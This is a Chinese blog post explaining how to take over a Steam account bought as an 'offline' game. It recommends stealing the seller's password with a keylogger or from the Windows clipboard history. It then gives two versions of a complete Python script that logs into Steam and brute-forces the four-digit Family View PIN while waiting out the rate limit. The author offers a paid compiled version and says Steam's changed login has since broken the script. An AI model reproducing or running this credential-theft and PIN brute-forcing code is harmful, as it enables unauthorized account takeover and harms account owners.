Steam家庭监护爆破
我去淘宝买了一个游戏的Steam离线版,实际上就是给你个账户下载安装后以离线模式运行,配合上Steam账户管理器玩起来感觉还是很不错的
但我总是对客户端上的 家庭监护 标志耿耿于怀...
失效
已确认 Steam 更换了登录算法,本文的脚本失效。
怎么搞到账户密码?
对很多店来说,他们不愿意把账户密码给你,更愿意直接远程,然后输入账户和密码,全部设置好后给设置为离线模式。
这个其实很好搞,Steam本身保护并不是非常到位,你可以采取记录键盘的方式记录下输入的密码,如果遇到和我一样偷懒复制粘贴的店家,你只需要借助Win自带的剪贴板历史(Win徽标+V)打开后就可以看到复制来的账户和密码啦~~~
怎么搞到家庭监护的Key?
Steam客户端和Steam网页都会被监护影响,经过测试,无论是客户端还是网页,都是输错5次暂停3分钟输入,那当然选择网页折腾啦~~
抓包的过程也很简单,需要注意的是,有个参数是附在网页中传递来的,需要取出来,然后遇到错误暂停3分钟继续咯。。。
rsa.js.zip
下面是脚本:
# !/user/bin/env python
# -*- coding:utf-8 -*-
# time: 2018/9/6--19:24
__author__ = 'Henry'
# I use his login code ,thx him
__sauthor__ = 'zponds'
'''
Steam login (RSA)
URL:https://store.steampowered.com/login/
'''
import requests
import time
import re
import execjs
import json
def steam_login():
req = requests.session()
headers = {
'Referer': 'https://store.steampowered.com/login/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
}
url = 'https://store.steampowered.com/login/getrsakey/'
data = {
'donotcache': str(int(time.time() * 1000)),
'username': user
}
html = req.post(url, data=data, headers=headers).json()
pub_mod = html.get('publickey_mod')
pub_exp = html.get('publickey_exp')
timestamp = html.get('timestamp')
with open('rsa.js', encoding='utf-8') as f:
jsdata = f.read()
passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
print(passencrypt)
# login
url = 'https://store.steampowered.com/login/dologin/'
data = {
'donotcache': str(int(time.time() * 1000)),
'username': user,
'password': passencrypt,
'twofactorcode': '',
'emailauth': '',
'loginfriendlyname': '',
'captchagid': '-1',
'captcha_text': '',
'emailsteamid': '',
'rsatimestamp': timestamp,
'remember_login': 'false',
}
html = req.post(url, data=data, headers=headers).json()
if html.get('emailauth_needed') == True:
print('Login requires your email verification code')
emailid = html.get('emailsteamid')
email = input('Please enter your email verification code:')
# login again
data['emailauth'] = email
data['emailsteamid'] = emailid
html = req.post(url, data=data, headers=headers).json()
print(html)
if html.get('login_complete') == True and html.get('success') == True:
print('logining...')
url_store = 'https://store.steampowered.com/'
html = req.get(url_store, headers=headers).text
username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
print('[Success!Username:' + username + ']')
r = req.get('https://store.steampowered.com/parental/blocked')
if '/parental/unlock' in r.text:
print('The account has a family view')
sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
success = False
start = input('PIN from:')
start_time = int(time.time())
for pin in range(int(start) - 1, 10000):
flag = True
while flag:
# 取出sessionID
pin_str = str(pin)
while len(pin_str) < 4:
pin_str = "0" + pin_str
data = {
'pin': pin_str,
'sessionid': sessionID
}
try:
r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
headers=headers)
r_json = json.loads(r.text)
if r_json['success'] == False:
if 'wait a while' in r_json['error_message']:
print('Sleep...')
time.sleep(180)
r = req.get('https://store.steampowered.com/parental/blocked')
sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
else:
flag = False
print("PIN: %s: %s" % (pin_str, r_json['error_message']))
else:
print("PIN: %s: SUCCESS!" % pin_str)
end_time = int(time.time())
print("Time: %ds" % (end_time-start_time))
success = True
except BaseException as e:
print('Error...')
time.sleep(10)
if success:
exit(0)
else:
print('The account does not have a family view')
else:
print('login fail...')
elif html.get('success') == False and html.get('message') != '':
print(html.get('message'))
print('login fail...')
if __name__ == '__main__':
user = input('account:')
password = input('password:')
steam_login()0000-9999 Pin 3分钟可以尝试5次,运气再差也就2-3天的事情吧~找台服务器放着就好啦~
搞到KEY之后?
解除掉家庭监护就可以添加家庭共享啦~
接下来这个账户的使用权就属于你啦~
什么?不会运行Python?
没有关系,我已经准备好了一个WINDOWS开箱即用的版本了!购买附件,下载后可以直接使用!
同时附赠一次指导!
2020年3月18日更新
- 掉线后会自动尝试重新登录
- 结束后会要求输入EXIT以退出
- BUG修复
- 当然,编译的WINDOWS文件也更新了
# !/user/bin/env python
# -*- coding:utf-8 -*-
# time: 2018/9/6--19:24
__author__ = 'Henry'
# I use his login code ,thx him
__sauthor__ = 'zponds'
'''
Steam login (RSA)
URL:https://store.steampowered.com/login/
'''
import requests
import time
import re
import execjs
import json
def steam_login(open_start=-1):
req = requests.session()
headers = {
'Referer': 'https://store.steampowered.com/login/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
}
url = 'https://store.steampowered.com/login/getrsakey/'
data = {
'donotcache': str(int(time.time() * 1000)),
'username': user
}
html = req.post(url, data=data, headers=headers).json()
pub_mod = html.get('publickey_mod')
pub_exp = html.get('publickey_exp')
timestamp = html.get('timestamp')
with open('rsa.js', encoding='utf-8') as f:
jsdata = f.read()
passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
# print(passencrypt)
# login
url = 'https://store.steampowered.com/login/dologin/'
data = {
'donotcache': str(int(time.time() * 1000)),
'username': user,
'password': passencrypt,
'twofactorcode': '',
'emailauth': '',
'loginfriendlyname': '',
'captchagid': '-1',
'captcha_text': '',
'emailsteamid': '',
'rsatimestamp': timestamp,
'remember_login': 'true',
}
html = req.post(url, data=data, headers=headers).json()
if html.get('emailauth_needed') == True:
print('登陆需要邮箱验证码...')
emailid = html.get('emailsteamid')
email = input('请输入验证码:')
# login again
data['emailauth'] = email
data['emailsteamid'] = emailid
html = req.post(url, data=data, headers=headers).json()
# print(html)
if html.get('login_complete') == True and html.get('success') == True:
print('logining...')
url_store = 'https://store.steampowered.com/'
html = req.get(url_store, headers=headers).text
username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
print('[登陆成功!用户名:' + username + ']')
r = req.get('https://store.steampowered.com/parental/blocked')
if '/parental/unlock' in r.text:
print('这个账户存在家庭监护')
sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
success = False
if open_start == -1:
start = input('从多少开始PIN(第一次运行请从0000开始):')
else:
start = open_start
start_time = int(time.time())
for pin in range(int(start) - 1, 10000):
flag = True
while flag:
# 取出sessionID
pin_str = str(pin)
while len(pin_str) < 4:
pin_str = "0" + pin_str
data = {
'pin': pin_str,
'sessionid': sessionID
}
try:
r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
headers=headers)
if len(r.text) > 2000:
return steam_login(pin)
r_json = json.loads(r.text)
if r_json['success'] == False:
if 'wait a while' in r_json['error_message'] or '错误尝试' in r_json['error_message']:
print('等待中...')
time.sleep(180)
r = req.get('https://store.steampowered.com/parental/blocked')
sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
else:
flag = False
print("PIN: %s: %s" % (pin_str, r_json['error_message']))
else:
print("PIN: %s: 成功!" % pin_str)
end_time = int(time.time())
print("Time: %ds" % (end_time-start_time))
success = True
except BaseException as e:
print('Error...')
time.sleep(10)
if success:
return
else:
print('您的账户不存在家庭监护!')
else:
print(html.get('message'))
print('登陆失败...')
if __name__ == '__main__':
user = input('账户名:')
password = input('密码:')
print('注意,跑PIN耗时可能非常长...可能长达两天...')
steam_login()
end = input('输入 EXIT 以退出...')
while end != 'EXIT':
end = input('输入 EXIT 以退出...')当前页面是本站的「Google AMP」版。查看、发表评论或购买附件请点击:完整版 »